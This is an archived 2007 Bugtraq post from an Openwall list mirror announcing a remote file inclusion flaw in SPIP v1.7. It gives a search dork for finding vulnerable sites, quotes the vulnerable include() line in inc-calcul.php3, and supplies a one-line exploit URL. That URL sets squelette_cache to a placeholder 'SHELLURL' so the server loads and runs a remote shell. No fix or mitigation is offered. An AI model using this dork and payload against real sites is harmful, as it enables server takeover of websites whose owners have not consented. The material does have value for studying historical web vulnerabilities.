lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: 23 Aug 2007 10:04:07 -0000
From: system-errrror@...mail.com
To: bugtraq@...urityfocus.com
Subject: SPIP v1.7 Remote File Inclusion Bug

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++             SPIP v1.7 Remote File Inclusion Bug !                   ++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++
++DORK : "/SPIP-v1-7-2/"
++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+----------------------------------------------------------------------------------+
+----------------------------------------------------------------------------------+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++
++ Bug in :  "SPIP-v1-7r/inc-calcul.php3"
++----------------------------------------------------------------------------------
++ Vlu Code:  -----------------------------
++           || include($squelette_cache); ||
++            -----------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++
++==================================================================================
++  Exploit :
++
++ http://sitename.com/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://SHELLURL?
++
++==================================================================================
++
+++++++++++++++++++++|Discoverd By :Darkdewil[system-errrror]|++++++++++++++++++++++
++                                                                                ++
++++++++++++++++++|Conatact : system-errrror[at]hotmail[dot]com |+++++++++++++++++++
++                                                                                ++ 
++++++++++++|Thx To :Cazanova & fedaiturk & n3twork & codes & by_Ka0s |+++++++++++++
++                                                                                ++
++++++++++++++++++++++++|sPECial THanks to :1923turk - grup|++++++++++++++++++++++++
++                                                                                ++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++            

Powered by blists - more mailing lists